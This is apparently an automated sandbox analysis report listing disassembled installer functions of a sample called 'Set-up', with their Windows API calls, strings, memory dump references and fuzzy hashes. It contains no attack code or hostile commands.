                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                    Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                    Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                    Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                    • wsprintfW.USER32 ref: 00404483
                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                    • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                    Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    Strings
                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                    • API String ID: 1697273262-1764544995
                                                                    • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                    • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                    Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                    • API String ID: 2577523808-3778932970
                                                                    • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                    • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                    • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                    • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                    Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatwsprintf
                                                                    • String ID: %02x%c$...
                                                                    • API String ID: 3065427908-1057055748
                                                                    • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                    • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                    • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                    • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                    Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                    • API String ID: 2266616436-4211696005
                                                                    • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                    • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                    • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                    • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                    Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00402100
                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004246CD,74DF23A0,00000000), ref: 00406902
                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                    • String ID:
                                                                    • API String ID: 1599320355-0
                                                                    • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                    • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                    • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                    • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                    Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                    • String ID: Version
                                                                    • API String ID: 512980652-315105994
                                                                    • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                    • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                    • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                    • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                    Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                    • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                    • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                    Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                    • String ID:
                                                                    • API String ID: 2883127279-0
                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                    Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                    Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                    • String ID: !N~
                                                                    • API String ID: 623250636-529124213
                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                    Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00405C74
